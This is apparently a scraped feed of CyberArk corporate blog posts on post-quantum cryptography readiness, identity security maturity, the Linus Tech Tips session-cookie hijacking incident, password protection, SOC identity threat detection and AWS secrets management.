Organizations can protect what matters most by securing all identities throughout the cycle of accessing any resource across any infrastructure. Doing so requires a holistic approach that unifies visionary technology and human expertise. The right Identity Security platform must protect critical data and systems against myriad threats to confidentiality, integrity and availability. The right Identity Security partner must be a trusted advisor, elevating security teams and strategies in ways technology cannot. Vision, experience, divergent thinking, technical acumen, empathy, high-touch support, ethical rigor, strong relationships, proven results – humanity in cybersecurity matters.

As AI/ML capabilities rapidly expand, our cybersecurity community must keep testing and pushing the limits of AI, sharing information and advocating for important guardrails. To echo Friedman’s words, only by working together can we “define how we get the best and cushion the worst of AI.”

Andy Thompson is CyberArk Labs’ Research Evangelist

]]>
Quantum Computing Is Coming… Here are 4 Ways to Get Ready https://www.cyberark.com/blog/quantum-computing-is-coming-here-are-4-ways-to-get-ready-2/ Mon, 03 Apr 2023 19:11:24 +0000 https://www.cyberark.com/?p=142399 Digital data flow

Ask a cybersecurity professional what keeps them up at night and you’ll get answers about insufficient staffing, IT complexity or constant attacks on their business. Quantum computing isn’t likely to make the list. Yet as technological change accelerates, real quantum risks are coming into view. Now is the time to prepare corporate IT systems for the “death” of classic cryptography to safeguard data and privacy in the future.

What is Quantum Computing?

Quantum Computing

Quantum computing isn’t just the stuff of science fiction. Physicists and engineers around the world have dedicated their life’s work to building a completely new type of computer. Once operational, quantum computers promise to unleash a new wave of innovation to solve some of the world’s greatest problems – from eradicating diseases with lifesaving drugs to safeguarding citizens through enhanced weather and traffic modeling.

Small-scale quantum applications, heavy investment activity and heightened government attention all signal progress on the quantum computing front. But building a large-scale general purpose quantum computer – the holy grail – remains an elusive engineering feat. It’s difficult to gauge exactly where things stand since most quantum research remains under wraps. However, many experts agree commercialized quantum computing will be here within the next two decades. Five manufacturers have even put stakes in the ground by promising fault-tolerant quantum-computing hardware by 2030.

Reimagining Public-Key Cryptography for the Post-Quantum World

Public Key Cryptography

Today, though we don’t give it much thought, we rely heavily on the TLS protocol to secure our digital connections as we access email, bank accounts, mobile apps and virtually everything else on the internet. These protocols use various cryptographic building blocks to securely transmit information. This process, known as cryptography, relies on hardness assumptions that prevent anyone without knowledge of the decryption keys from decrypting our data. But these assumptions will only hold until the first large-scale quantum computer arrives, powerful enough to run algorithms that break these assumptions within hours – something all of today’s computers combined couldn’t do in a billion years. When this happens, all the digital information transmitted over the internet – today and in the future – could become vulnerable.

Algorithms published back in the mid-1990s, including Shor’s Algorithm and Grover’s Algorithm, signaled quantum computers’ potential to break modern encryption. These quantum algorithms are just waiting on hardware that’s built with enough processing power to run them.

Recognizing these risks, the U.S. National Institute of Standards and Technology (NIST) initiated a process in 2016 to “solicit, evaluate and standardize one or more quantum-resistant public-key cryptographic algorithms” and ultimately deliver an accessible, secure post-quantum communications method. In July 2022, NIST unveiled the first four quantum-resistant encryption algorithms. But as with every standardization push, the process takes rigor and time – about two more years until the standard is finalized, according to NIST’s estimate.

Meanwhile, the Biden administration is one of many governments that’s taking quantum computing risks seriously. In December 2022, the president signed the Quantum Computing Cybersecurity Preparedness Act, calling for federal agencies to run cryptography mapping by May 2023 in preparation for the transition to NIST-approved cryptographic algorithms. Just a few months prior in September 2022, the U.S. National Security Agency (NSA) outlined requirements for owners, operators and vendors of national security systems (NSS) to start using post-quantum algorithms by 2035.

Four Steps to Get Quantum Ready

While these efforts mark important progress, we still face a long, winding road to post-quantum cryptography adoption. Just consider that it’s taken almost 20 years to deploy modern public key cryptography infrastructure.

Whether your organization ultimately chooses to use an existing quantum-resistant algorithm or wait for a definitive standard to be published, replacing today’s methods be challenging. While it may seem like quantum computing is lightyears away, the time to start preparing for a transition – along with many other post-quantum business realities – is now. As you keep an eye on emerging government requirements and standardization milestones, here are four steps you can take:

1.  Know your crypto. This may sound obvious, but cryptography is so engrained in our systems, applications and devices that many organizations don’t even know which algorithms they’re running. Step one is to find out.

2.  Inventory your data. Focus on your most critical assets first – especially sensitive datasets with a long shelf life. Ask yourself: What are the consequences of someone getting their hands on this encrypted data today and decrypting it in ten years? The answer to this question will significantly affect the migration plan in terms of priority and timetables.

3.  Map your crypto connections. Create a map of each corporate system using cryptography, and what data exists within each system. This will help you identify the riskiest areas of post-quantum vulnerability. As previously mentioned, switching cryptography algorithms will be a process. Fortunately, most organizations won’t have to make a massive switch all at once. Many datasets will not require quantum-safe security methods right off the bat.

4.  Make a plan. Use your learnings from steps 1-3 to start developing a cryptographic transition plan that encompasses other cybersecurity and data privacy standards that may need to be updated, along with steps for hardening existing security systems and processes. It’s important to note that prioritizing one system over another for cryptographic transition highly depends on organizational functions, goals and needs. The European Telecommunications Standards Institute (ETSI) and U.S. Department of Homeland Security offer detailed guidance and prioritization considerations for this.

If your organization has the cryptographic expertise, it can get involved with NIST or other entities working to develop post-quantum cryptography standards and raise awareness. For example, my fellow cryptographers may be interested to know that NIST is currently accepting additional post-quantum cryptography digital signature scheme proposals until June 1, 2023.

Changing our cryptographic infrastructure won’t happen overnight but with enough lead time, collaboration and a pragmatic approach, we can move confidently and securely into the quantum computing era.

Quantum steps

Dr. Erez Waisbard is a Technology and Research Lead at CyberArk

Editor’s note: To learn more about quantum computing’s impact on classic cryptography, read Dr. Waisbard’s Medium post, “Quantum Computing is Going to Kill Classic Cryptography. But We Can Still Save It” and tune in to our podcast conversation on this topic on the Trust Issues podcast.

]]>
How to Map Identity Security Maturity and Elevate Your Strategy https://www.cyberark.com/blog/how-to-map-identity-security-maturity-and-elevate-your-strategy/ Tue, 28 Mar 2023 12:54:54 +0000 https://www.cyberark.com/?p=141360 Identity Security Maturity

The ultimate goal of Identity Security is to provide secure access to every identity for any resource or environment, from any location, using any device. Yet ever-evolving technology and dynamic threats can make executing a comprehensive Identity Security program a complex undertaking. According to the new Enterprise Strategy Group (ESG) research report “The Holistic Identity Security Maturity Model,” most organizations (42%) are still in the early days of their Identity Security journeys. Understanding your business’s current Identity Security maturity in relation to its ideal state is vital because, in the words of Henry Kissinger, “If you do not know where you are going, every road will get you nowhere.”

So, where do you start? What assessment factors matter most? How do you stack up against industry peers and track improvement over time? To help eliminate some of this guesswork, ESG created a data-driven Identity Security Maturity Model that measures maturity levels across four distinct tenants. This model draws on insights from 1,500 global cybersecurity professionals responsible for securing identities in multi-cloud IT environments.

Prescriptive guidance is also found in the CyberArk Blueprint for Identity Security Success, a vendor-agnostic framework for developing a successful Identity Security program. The Blueprint is based on decades of experience and lessons learned from helping more than 8,000 global organizations secure their identities and protect what matters most.

Two Critical Identity Security Program Assessment Factors

As your organization thinks about building its Identity Security program, there are two fundamental factors to consider in tandem: Capability breadth and deployment depth.

The Identity Security Maturity Model describes the breadth of capabilities across tools, integrations, automation and continuous threat detection and response (CTD&R). These are capabilities and integrations your organization should strive to deliver to mitigate Identity Security risk. That guidance is supplemented by the CyberArk Blueprint, which not only considers capability breadth but also deployment depth by aligning capabilities to specific resources and environments requiring Identity Security controls.

identity security breadth and depth matrix

Figure 1: Identity Security Breadth and Depth Matrix

While you may understand your organization’s capability breadth, it does not explicitly correlate to the depth in which those capabilities have been implemented across your environment. For this reason, it’s essential to consider the Identity Security Maturity Model and the CyberArk Blueprint together as you chart your course.

This is illustrated in the above diagram. While the Transformative organization may be more capable than the Novice, that doesn’t necessarily mean it has implemented the right capabilities across the right identities and resources or mitigated the most prevalent Identity Security threats by risk priority.

Maximizing Your Capabilities: Guidance for Novice Organizations

If you’ve assessed your organization as “Novice,” you’re not alone: 42% of global organizations operate at this capability maturity level today.

We’ve aligned ESG’s model with our proven CyberArk Blueprint framework to help you measure the breadth and depth of your Identity Security program and determine pragmatic steps to uplevel your strategy. Your dual aim should be advancing your position in the Identity Security Maturity Model while addressing security deficiencies in risk-based phases to go deeper with the CyberArk Blueprint.

Below, we’ll demonstrate how a Maturity Level 1: Novice organization can use these combined insights to maximize Identity Security capabilities and outcomes.

Snapshot of a Novice Organization

While 38% of Novice organizations believe they’ve made correct identity-related decisions, most organizations at this level have yet to invest in foundational Identity Security tools and lag in integrating and automating tools they do have in their environments. Existing controls tend to focus heavily on human identities, leaving third-party and non-human identities unmanaged. Generally, these organizations lack the confidence to mitigate identity-related risks promptly and are slow to respond to audit requests.

There is a clear gap between investment and outcomes at this level: 32% of Novice organizations have suffered two or more successful identity-related cyberattacks compared to just seven percent of the most mature organizations – those categorized as Transformative. Many of these attacks stem from credential compromise and malware. Novice organizations point to fragmentation, insufficient staffing and budget constraints as major roadblocks yet continue to forge ahead with cloud adoption that can significantly expand the attack surface.

Novice Blueprint Focus: Secure High-Value Targets for Rapid Risk Mitigation

Without proper Identity Security controls in place, malicious actors can easily steal credentials to exploit identities, move laterally and vertically throughout the environment, and ultimately escalate and abuse privileges to achieve their goals. This attack chain is at the center of all identity attacks.

Fortunately, Novice organizations can quickly address their greatest liabilities by focusing on highly privileged identities, which attackers often exploit to take control of an environment. These identities may have entitlements such as cloud admin, domain admin, hypervisor admin or Windows server admin. The personas who consume these privileges are often cloud operators, site reliability engineers and IT administrators, a relatively small scope of identities that pack a massive punch.

By taking the Blueprint’s risk-based approach to prioritization, Novice organizations can measurably drive down risk while making the most of existing capabilities, controls and integrations. The same logic applies to organizations at every maturity level. As you expand your toolset and mature your capabilities, a risk-based approach keeps you focused on the right identities and personas at each stage of the journey.

Building Your Identity Security Plan

To get started, develop a strategy for maximizing the impact and value of current controls – this is especially important for organizations in the early stages of maturity.

This should culminate in a program roadmap that sets the direction for the Identity Security initiative and leads to advanced levels of maturity. Therefore, aligning Maturity Level 1: Novice with Stage 1 of the CyberArk Blueprint becomes an important fundamental strategy when building a plan that seeks to maximize risk reduction and impact.

However, it’s important to remember these are two distinct models, and explicit one-to-one mapping of maturity levels and Blueprint stages shouldn’t be the goal. Additionally, every organization is unique. To take full advantage of this foundational guidance, you must understand your organization’s current risk state and capabilities. You’ll also need to take stock of internal priorities. For instance, are you facing new audit and compliance requirements, advancing a Zero Trust initiative or reacting to an internal security incident or breach? While these are all valid reasons for prioritizing security efforts, they alone should not define your plan. Initiatives driven by internal priorities must also consider the level of risk, impact of mitigation and level of effort, as well as relevant industry guidance to help drive informed decision-making.

Finally, your organization’s desired business outcomes (the goals, objectives and specific results you seek to achieve through the Identity Security program) must also be factored into roadmap design. You can learn more about incorporating multiple organization-specific factors into a roadmap in our Success blog post, “Create Your Identity Security Roadmap with the CyberArk Blueprint.”

identity security roadmap example

Figure 2: Identity Security Roadmap Example

 

By marrying all these together, you can create a winning Identity Security roadmap that’s tailored to your organizational needs and risks, but still reflective of industry and security best practices.

As mentioned, since every organization is unique, there is no one-size-fits-all way to approach Identity Security. However, we hope this information provides some useful prioritization guidance and clarity as you mature your strategy. You can also explore ways to use the CyberArk Blueprint to help achieve specific goals, from understanding the identity attack surface and assessing your security posture to learning best practices and building your roadmap.

 

Source: ESG White Paper, The Holistic Identity Security Maturity Model, February 2023.

]]>
LTT Attack Targets Session Cookies to Push Crypto Scam https://www.cyberark.com/blog/ltt-attack-targets-session-cookies-to-push-crypto-scam/ Mon, 27 Mar 2023 08:12:45 +0000 https://www.cyberark.com/?p=141767 Cookies with bitcoin symbol

Crypto scams are skyrocketing: In 2022, the FBI tracked an 183% year-over-year increase, driving $2.57 billion in losses. Last week, the popular YouTube channel Linus Tech Tips (LTT for short) – and two associated channels – became the latest crypto scam victim and unsuspecting accomplice. In this video, host Linus Sebastian gives a first-hand account of what went down – highlighting the dangers of cookie hijacking and the need for stronger endpoint privilege security protections across the board.

Recapping the LTT YouTube Account Takeover

Based on news reports and Sebastian’s explanation of the LTT attack, here’s a quick recap:

  • An LTT content editor opened a PDF email attachment that appeared to be work-related.
  • Within 30 seconds, the attachment – actually malware – dumped all the information from both Chrome and Edge browsers on the machine, including web session tokens. Also known as cookies, these are used to authenticate a device or browser and enable users to stay logged into websites.
  • By hijacking these cookies, the attacker was able to do everything from bypassing password and multi-factor authentication login prompts to mass-deleting existing videos, changing channel names and live streaming a crypto scam video.
  • After numerous attempts to shut down the scam videos, LTT finally restored control of the channel with YouTube’s help.

Cookie Hijacking: It Gets the Job Done

Cookie hijacking isn’t a new or sophisticated attack technique for gaining access to a corporate environment, but it gets the job done. Especially now that web-based applications are ubiquitous, attackers and credential-stealing malware often go after browsers (which seemingly know everything about us). They recognize that there’s no need to attack domain controllers anymore when targeting browsers – treasure troves of stored credential data (URL/username/password combinations) and session cookies – are just as effective and take far less effort.

Most cyberattacks require some privileged access but not cookie hijacking. CyberArk Labs researchers demonstrated in 2022 that session cookies could be extracted effectively by a standard process running on the endpoint machine. In other words, any program or script that’s executed by a standard business user (or an attacker pretending to be one) can access the security tokens and credentials stored in the browser. This is critical as the session tokens stored by browsers in cookies are post-MFA and long-lived, meaning one can use them to bypass MFA mechanisms and access cloud services and on-premises applications.

Efforts to address this are detailed in CyberArk Labs’ GO BLUE! manifesto, which further underscores the challenges organizations face in defending against attackers who manage to log into devices as legitimate users.

Phishing, Human Error and the Endpoint Privilege Security Safety Net

As so many do, the LTT attack began with spear phishing. Many point to cybersecurity training as the answer. While this can help reduce the number of successful phishing attacks and speed up response times, even the best cybersecurity education can’t change the fact that people make mistakes. When they do, technology should be there to step in, bridging that gap and minimizing the impact of human error.

In the case of LTT, a piece of malware was downloaded from the internet and executed on an endpoint machine. Instead of pointing fingers and placing blame, proper endpoint privilege security controls work in concert to identify malware and block it from running in the first place.

With the right endpoint privilege management approach, a mistake will remain a mistake. Not an “end of all,” or a “We are writing to notify you of a cyber incident” event. Just a mistake.

policy option settings

This is not the first nor will it be the last time we see a major social media account takeover. But this LTT attack stands out for its leader’s unusual response: Sebastian lifted a veil for the community by demonstrating how quickly things can spiral and why a technology safety net is required to protect from attacks like cookie hijacking. This attack trend continues to grow in popularity and demands our attention.

To see a cookie hijacking attack through the eyes of an attacker and explore mitigation best practices, check out this on-demand webinar hosted by CyberArk Labs and the Red Team.

]]>
Protect Passwords, Don’t Just Manage Them: A Game Plan for CIOs and CISOs https://www.cyberark.com/blog/protect-passwords-dont-just-manage-them-a-game-plan-for-cios-and-cisos/ Fri, 17 Mar 2023 18:37:32 +0000 https://www.cyberark.com/?p=141420 passwords protect CIO CISO

When 921 password attacks occur per second, it’s time to treat everyday employees’ credentials like the true operational risk they are.

Today’s attackers assign a level of value to employees’ passwords they once reserved for privileged users’ credentials. Why? Workers now have a shocking amount of access to sensitive resources. I’ll elaborate… but through the perspective of a chief information officer kept up at night by risks.

Here’s an example of what crosses a CIO’s mind at 2:30 a.m.

Fifty-two percent of employees have access to sensitive corporate data, according to a CyberArk survey of 1,750 security decision-makers from ten industries. In some sectors, that percentage is even higher:

  • Six out of 10 (62%) employees in the media, leisure and entertainment industry, where the data may include millions of subscribers’ personal information
  • Nearly two-thirds (65%) of employees in the healthcare sector, where the data may — again — include subscriber information, but this time for health insurance policies or patient records

What could happen if a single app is compromised in either industry? Lost trust, which can equal lost subscribers, revenue, market share and credibility among regulators.

workforce corporate data chart

 

As I calculate all of this (while I should be sleeping), what alarms me the most is what’s standing in between these sensitive resources and attackers who constantly target them:

  1. Passwords, which are a key contributor to the 82% of attacks stemming from “the human element” which includes the many unsafe ways employees create, store and share credentials.
  2. Tools for managing passwords that are designed for personal use, but often end up being used by entire enterprises — even though they typically lack basic security controls.

If attackers are treating employees’ credentials like they’re privileged, then so should we … right down to the specific ways enterprises secure how passwords are stored, shared, created and managed. In this post, I’d like to share my thoughts on strategic steps you can take to mitigate your organization’s password risks.

 

Understand Your Password Vulnerabilities with a Risk Assessment

My 25 years of experience in the Israel Defense Forces taught me how important a strategic risk assessment can be, including:

  • The risks you face.
  • The probability and likelihood of attacks.
  • The gaps that make your organization vulnerable.

Why start with such an essential assessment? I recall a major cyber exercise from years ago — this approach helped me make a calculated decision that would affect the organization’s operational continuity.

Focusing on passwords, let’s start with what we know.

Many widely used applications are incompatible with — and therefore not protected by — your single sign-on (SSO) tool. They also don’t use modern identity protocols. This includes popular apps for virtual collaboration, banking and shipping.

We also know that employees often access these unprotected apps through one of two methods:

  1. Passwords created with little attention to complexity or uniqueness, often stored in places like Excel docs saved on endpoints — and often shared via unsecured methods like email.
  2. Passwords stored in — and retrieved from — the consumer-grade tools I mentioned earlier, which might allow a simple UX, but typically cannot:
    – Provide control and visibility into who has access to what apps.
    – Offer detailed logging and reporting functionality, which limits auditing capabilities.
    – Prevent employees from saving passwords in their browsers, a key entryway for attackers targeting endpoints.

Now, let’s ask questions whose answers you may not know yet – but will ultimately give you data that informs strategic decisions.

  • In your organization, which apps live outside of SSO and how many are there? What kinds of data do these apps contain? Which apps are approved by IT and which bypassed your policies?
  • Who in your workforce is using these apps: small, concentrated segments of employees, entire business units or the full organization?
  • For each of these high-risk apps, what controls and tools — if any — do you have in place for not merely managing them, but protecting them?

With a data-informed assessment of your enterprise’s password vulnerabilities, you can decide on which controls to put in place to mitigate risks to your organization.

Action Steps: Four Ways to Protect Passwords Like They’re Privileged Credentials

Here are four ways you can apply security-first controls to employee passwords while balancing the need for protection and productivity.

1. Security-first Password Storage and Retrieval

IT and security teams can mitigate the risks of highly vulnerable passwords by implementing secure, centralized storage for workforce credentials. Key functions to look for:

  • The ability to centrally control how accounts and credentials are stored, managed and retrieved
  • The peace of mind of securing passwords with end-to-end encryption in transit or at rest
  • The flexibility to host passwords in a secure cloud location or self-hosted vault, depending on your organization’s needs

Organizations can protect employee credentials by enabling automated, real-time password retrieval from their chosen cloud or vault location. Inspired by just-in-time controls typically used for the IT admins of the world, this capability can help CIOs, CISOs and their teams ensure passwords are never stored locally at endpoints — thus reducing the attack surface.

2. Safe Password Sharing and Account Management

Considering the threats we’ve discussed, you’re likely seeking greater control over how employees share passwords. By applying a least privilege approach, enterprises can ensure that employees — for example, line-of-business team managers — can securely share credentials without revealing password characters. Here are key controls to adopt:

  • Protect privacy by controlling who can share, view and edit credentials.
  • Impose precise time limits on how long a user can access a shared app.
  • Manage the transfer of credential ownership to new users.
  • Prevent users from saving passwords in built-in browser password managers, reducing the number of accounts and credential repositories.

In an era of increased workforce turnover, this level of control is essential. For example, with automated tools, you could transfer ownership of an app’s account without losing the chain of custody when the primary owner leaves your organization.

security employee turnover chart

3. Frictionless — and Secure — User Experience

Eighty-six percent of security leaders believe that optimizing the user experience is important-to-very important for enabling Zero Trust success through Identity and Access Management tools. Building upon that perspective, enterprises can benefit from the password protection capabilities that can:

  • Integrate with corporate directories and third-party identity providers.
  • Know when users are entering credentials into web apps’ login forms and offer to save them in a secure vault — and securely auto-fill credential fields in future instances.
  • Automatically generate strong, complex and unique passwords for users whenever needed.

4. End-to-end Visibility for Audits and Reporting

An enterprise-grade approach to password protection should provide real-time visibility into users’ access activity. For example, security admins need the ability to determine which employees have accessed a specific application during a particular time — with intuitive reporting for audits.

But what happens to visibility after a user logs in? Security controls must continue past the point of authentication. Enterprises should look for ways to require an extra layer of protection that allows them to monitor and record all actions taking place once a user is logged in.

In light of today’s compliance demands, it’s important to ensure any records surrounding high-risk actions taken in apps are backed up by a full audit trail.

Putting it All Together: Identity Security

Eighty-two percent of security decision-makers have an assume-breach mindset. If you’re among them, you know: no organization is immune to a breach or attack. So as part of your strategic planning, it’s essential to have operations in place to deal with threats as they materialize.

By using the four best practices in this piece, you can meet the urgent need of securing employee credentials and enforcing an enterprise-wide password policy. And while passwords are a reality for organizations today, you can build toward a passwordless future, as our industry continues to innovate.

In the meantime, it’s important to keep the long game in mind.

Securing the enterprise is an ongoing mission. As you bolster your password protection capabilities, you can build toward a holistic Identity Security approach that brings together a range of controls and solutions. Considering what we’ve learned from recent breaches, here are a few examples of how an Identity Security mindset can help you:

If you have enterprise-grade password protection, you can complement it with adaptive multifactor authentication (MFA) that can increase the difficulty of challenges when it identifies signs of risk.

  • If you believe parts of your workforce — for example, employees with access to cloud controls — should pass MFA no matter what (keeping in mind MFA fatigue), you can require phishing-proof MFA factors such as number-matching authentication.
  • If you’re concerned about attackers stealing credentials at the endpoint, you can establish controls to ensure users can only access critical environments from trusted machines.
  • If you’re working on putting the right solutions in place, remember: having the right people in place is also key. From CIOs and CISOs to admins and DevOps teams, everyone has a role to play.

Together, these are key examples of Identity Security in action. We at CyberArk advocate this approach to our customers and partners and we use it ourselves. I believe this is the way to protect passwords, enable Zero Trust and hopefully… reduce the number of concerns keeping you up at night.

You can learn more about our solution for applying enterprise-grade protection to your employees’ passwords: CyberArk Workforce Password Management.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

]]>
How to Streamline Security Operations With Identity Security Intelligence https://www.cyberark.com/blog/how-to-streamline-security-operations-with-identity-security-intelligence/ Thu, 09 Mar 2023 21:59:02 +0000 https://www.cyberark.com/?p=141195 Pattern intended to metaphorically depict author Nicholas Nassim Taleb’s “false patterns” quotation mentioned in this post.

“Black Swan” author Nicholas Nassim Taleb once wrote that “intelligence consists in ignoring things that are irrelevant (avoiding false patterns).” Organizations must take this definition to heart as they incorporate Identity Security intelligence – an essential element of any Zero Trust cybersecurity strategy.

Many organizations have dedicated Security Operations Center (SOC) teams responsible for their threat detection, investigation and response efforts. To the layperson, SOC teams often seem like the all-seeing eye of an organization, immediately detecting any bad behavior across infrastructure, applications and endpoints. In reality, though, monitoring for threats, remediating vulnerabilities and executing incident response plans are a ton of work. SOC teams must work across the security organization to collect and analyze the right data and ignore false positives (a.k.a. irrelevant things). In the case of Identity Security, this means analyzing user behavior analytics that enable rapid responses to anomalous or risky privileged access to infrastructure and applications.

The 2022 CyberArk Identity Security Threat Landscape Report reveals that credential access is the most reported risk of all tactics in the MITRE ATT&CK framework. This isn’t exactly shocking. Most cyberattacks take the path of least resistance: compromise an identity by stealing credentials, move laterally and escalate privileges.

Yet despite this understanding, many organizations struggle to apply enhanced threat detection to their most significant source of cybersecurity risk: compromised identities and credentials. To embody Zero Trust and an assume-breach mindset, organizations must improve their ability to respond rapidly to identity-centric attacks.

Why It’s So Difficult to Detect and Remediate Identity-related Threats

To better understand the challenges of detecting and mitigating identity compromise attacks, let’s dive a bit deeper. Organizations face several challenges with identity threat detection and protection, such as:

1. A wide variety of attack methods. The bad guys have lots of effective methods to compromise identities. From phishing, social engineering and credential harvesting to ransomware attacks that aim to compromise local admin accounts on endpoints, attackers have a big arsenal of tactics used to steal credentials and passwords.

It may take time to realize passwords have been stolen. And insider threats pose another significant complication. When employees break bad, they can use their existing, valid credentials. To defend against internal bad actors, organizations need holistic data and context to identify anomalous or high-risk behavior.

2. Internal access control friction. It’s not always easy for Identity Security and SOC teams to get along. Identity Security programs manage access control policies, provisioning entitlements while adhering to audit and compliance requirements like the rule of least privilege. These teams also own authentication and authorization policies that may be designed to address usability requirements from their developer, admin and workforce stakeholders. This can cause more permissive access control policies than the SOC team might design to prioritize risk reduction.

At the same time, SOC teams may need to use administrative accounts outside of their regular responsibilities when remediating security incidents. Without clearly documented incident response plans and policies granting access for automatic remediation, SOC teams can face slower response times.

3. Siloed technologies and processes. Remember the point about ignoring false patterns? It’s important that threat analytics capabilities in privileged access management (PAM) or Identity as a Service (IDaaS) solutions integrate with the tools SOC teams already rely on. Key examples include security information event management (SIEM) and extended detection and response (XDR) solutions. Without the full data that these integrations provide, SOC teams may not be able to see the full picture and could identify false positives.

Even worse, without proper data correlation to generate alerts, Identity Security solutions might not allow SOC teams to see the signal in the noise. Without full context, SOC teams might miss valid patterns that could indicate compromise. For example, an organization with siloed IDaaS and PAM analytics may be able to detect individual low-risk actions like an administrator entering a low-risk command in a privileged session or accessing a web app from an irregular location. In combination, these “low-risk” events may be a strong case for a closer look. But with siloed analytics, SOC and Identity Security teams may not spot the valid pattern.

Threat detection capabilities are only as effective as the data they can analyze. If Identity Security and SOC technologies are not integrated for multi-directional data sharing, SOC teams may face a high number of false positives or worse – a low number of threats detected.

How Can Identity Security Intelligence Streamline Security Ops?

Security is a team game. As with any other security challenge, solving this gap in identity threat detection and prevention requires a combination of people, processes and technology. Here are some recommendations:

1. Document and automate processes for responding to identity-centric attacks. Documented plans in incident response scenarios provide a standardized playbook to help ensure alignment and accountability between SOC and Identity Security teams. And in many cases, documented incident response plans can also help satisfy cyber insurance, audit and compliance requirements.

As a best practice, building clear plans for responding to different types of security incidents (e.g., dedicated actions for remediating a phishing attack) can also streamline response processes, helping minimize the business disruption of security incidents.

2. Centralize threat detection across all user access. Multi-contextual analysis of user access can provide SOC and Identity Security teams with a complete picture of a potential security incident. This data correlation can help accelerate detection and response.

For example, Identity Security Intelligence, a shared service of the CyberArk Identity Security Platform, analyzes a user’s access to web applications and privileged accounts to detect and remediate in-progress attacks. Identity Security Intelligence centrally gathers user behavior analytics data such as login date and time, login location and actions performed by privileged accounts. The service then detects and sends alerts regarding behavior that departs from a user’s behavioral baseline access patterns to web apps and IT infrastructure. The CyberArk Identity Security Platform analyzes a user’s access to web applications and privileged accounts to detect and remediate in-progress attacks. Identity Security Intelligence centrally gathers user behavior analytics data such as login date and time, login location and actions performed of privileged accounts. The service then detects and sends alerts regarding behavior that departs from a user’s behavioral baseline access patterns to web apps and IT infrastructure.

Screenshot of CyberArk Identity Security Platform
Multi-contextual user behavior analytics in Identity Security Intelligence

Armed with sharper, multi-contextual insight, SOC and Identity Security teams can identify and respond to combinations of behavior that may signal identity compromise, such as an irregular login time, and then entry of specific commands in a remote session to a corporate server.

3. Integrate Identity Security and SOC Team tools. Identity Security teams must arm their SOC teams with the data their solutions naturally detect. Data and alerts from threat analytics services like Identity Security Intelligence can accelerate the SOC team’s ability to detect stolen credentials, insider threats and other identity-centric attacks.

Similarly, SOC teams must configure integrations between their tools and Identity Security solutions to remediate threats. For example, if a SOC team identifies potential abuse of a privileged account used to maintain Windows servers, integration with a PAM solution can automatically suspend or terminate the session. Or in another scenario, if Identity Security Intelligence sends an alert on a risky command entered on a Linux server, security teams can use CyberArk’s identity orchestration capabilities to automatically prevent the employee from using privileged accounts through PAM.

Putting It All Together: The Need for Identity Security Intelligence

Intelligent identity threat detection efforts require a holistic view of user behavior that helps teams spot only the relevant patterns. Identity Security Intelligence can help organizations reduce the risk of identity-centric attacks by eliminating siloes between teams, documenting processes and integrating technologies to rapidly detect and respond to identity-centric threats.

Learn more about Identity Security Intelligence.

Sam Flaster is a director of product marketing at CyberArk.

]]>
Secrets Management: Meeting Developers Where They Are https://www.cyberark.com/blog/secrets-management-meeting-developers-where-they-are/ Wed, 01 Mar 2023 20:00:47 +0000 https://www.cyberark.com/?p=140767 Meeting Developers Where They Are for Secrets Management

There’s always a balancing act when it comes to building and deploying cloud-native applications in environments like Amazon Web Services (AWS). The whole point of moving production to the cloud is that developers can move faster than ever before, innovating and shipping new features on a daily basis. But that same speed can be an organization’s downfall if development outpaces security processes and accidentally exposes secrets or other credentials to potential attackers.

On the one hand, you’ve got 71% of organizations developing and deploying cloud-native apps, according to the Enterprise Strategy Group’s (ESG) 2023 Technology Spending Intentions Survey. On the other hand, 70% of organizations from another ESG report believe they have more than 50 secrets embedded just in their Git repositories, and 31% experienced a cybersecurity incident where secrets were stolen from a source code repository. Hard-coded secrets or secrets that aren’t properly rotated or revoked can become vulnerabilities that cyberattackers can exploit to gain access to an organization’s critical systems and resources.

Exposure of secrets, whether hard coded or compromised, can have a massive impact on the business. For example, in the recent breach of CircleCI, a continuous integration/continuous deployment (CI/CD) tool, the attacker stole the identity of an employee with privileges to create production access tokens. The attacker was able to exfiltrate data that included customer environment variables, tokens and keys, which could be used to gain access to customer systems. That led to impacted customers having to rotate all secrets stored on CircleCI, a potentially labor-intensive process if they do not have a centralized secrets management solution. Beyond the risk of a potential breach, impacted organizations spent time and resources that could be dedicated to other tasks on quickly revoking access and updating keys across their environments.

Who Owns Cloud-native Secrets Management?

So we know secrets management is a critical task, especially when working in cloud environments like AWS. AWS now has a native tool, AWS Secrets Manager, that many developers use to store application secrets.

It’s not fair or effective to put the burden of securing secrets on solely the developers’ shoulders. They’re trained in building and deploying applications, and their performance is evaluated on how well (and how fast) they can accomplish those projects. Securing secrets, maintaining least privilege access and other security principles aren’t traditionally their responsibility, and expecting them to focus on these security tasks instead of their development priorities can lead to production delays. If different project teams are all managing secrets for their project separately in multiple vaults (or multiple instances of AWS), it can be hard to get visibility, apply consistent policies and audit access across projects and accounts. All that makes it harder to respond to security events like the CircleCI breach when they happen.

A better solution is to have security teams handle secrets management across the enterprise, including for cloud-native applications. However, this can’t be at the risk of slowing developer velocity. Security processes that require code changes or changes to developer workflows will inevitably introduce delays and create frustration for cloud-native developers who need to move fast to meet business directives. Instead, security teams need a way to manage secrets for cloud-native applications in a way that is seamless for developers and meets them where they are (i.e., AWS), rather than trying to force a solution that slows them down or adds more work to their plates.

It’s a balancing act. Security teams want to centralize secrets management across all projects and accounts. Meanwhile, cloud architects and developers want to meet security policies without changing their existing processes by continuing to use native tools such as AWS Secrets Manager.

What Makes an Effective Cloud-Native Secrets Management Solution?

To better manage secrets for cloud-native environments like AWS, security teams need a solution that’s easy to use and leverages existing workflows, processes and tools. That makes it easier for developers to incorporate in their day-to-day operations and doesn’t place undue stress on the security teams trying to manage a large volume of secrets.

An effective secrets management solution for cloud-native environments provides six key benefits:

  1. It provides visibility, control and management over all secrets across projects and accounts through a single pane of glass, mitigating vault sprawl across multiple AWS instances and projects.
  2. Management, rotation and synchronization of secrets is simplified in a way that is transparent to developers, so critical functionality isn’t interrupted.
  3. Security teams can easily find and manage secrets across existing instances of their native cloud secrets management tools like AWS Secrets Manager.
  4. The developers’ preference for choice is fulfilled, as they can maintain their native user experiences with AWS Secrets Manager.
  5. Automatic rotation of secrets with cloud-native secrets increases operational efficiency for both security and developers (think of how much time and effort this would save in the event of a security incident like CircleCI’s recent breach).
  6. Transitioning workloads to AWS is accelerated by enabling the same security policies to be enforced across hybrid and cloud environments.

